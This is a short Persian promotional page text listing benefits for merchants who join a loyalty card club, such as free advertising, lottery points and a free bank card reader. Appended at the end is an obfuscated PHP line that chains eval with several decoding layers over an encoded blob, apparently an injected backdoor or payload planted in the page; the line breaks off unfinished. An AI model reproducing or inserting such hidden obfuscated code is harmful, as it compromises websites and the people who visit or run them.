حمایت از پذیرندگان

 • بـهره مندی از مشتریان بیشتر با توجه به گسترش در سطح کـشور
 • استفاده از تبلیغات رایگان در زمینه های مختلف به فراخوان زمان
  • کتاب راهنمای خرید
  • سایت رسمی شرکت
  •  نرم افزار مخصوص تلفن همراه

 

 • اعطای امتیاز شرکت در قرعه کشی و جوایز ویژه
 • نصب رایـگان دستگاه کارت خوان بـانکی با قـابلیت استفاده بـرای کلیه کارت های بانکی با ویژگی محاسبه تخفیف اتوماتیک مخصوص اعضای باشگاه گنج کارت
 • وفـادارسازی مـشتریان بر اسـاس جـدیدتـرین متدهـای روز دنیـا
eval(gzuncompress(gzinflate(convert_uudecode(str_rot13(base64_decode(urldecode("WmA2JGBUQl1LVCRaLUZZTjc0Kz8xM1xRWVlILkpMQSgkYDBQKTY5MTo2KVY5UiFXP1RMPjxXVyIxUVJTNApaUkxPO1dXJDAnXl9TTT4sOidNXkBXOiJUVSpNPzYlRTw2UipZN0hNMFFMVztUTT03USUmQFhTUi1QQFMpCiw%2BPDdSVzQ1MGBDIUdTMkNLCmAK"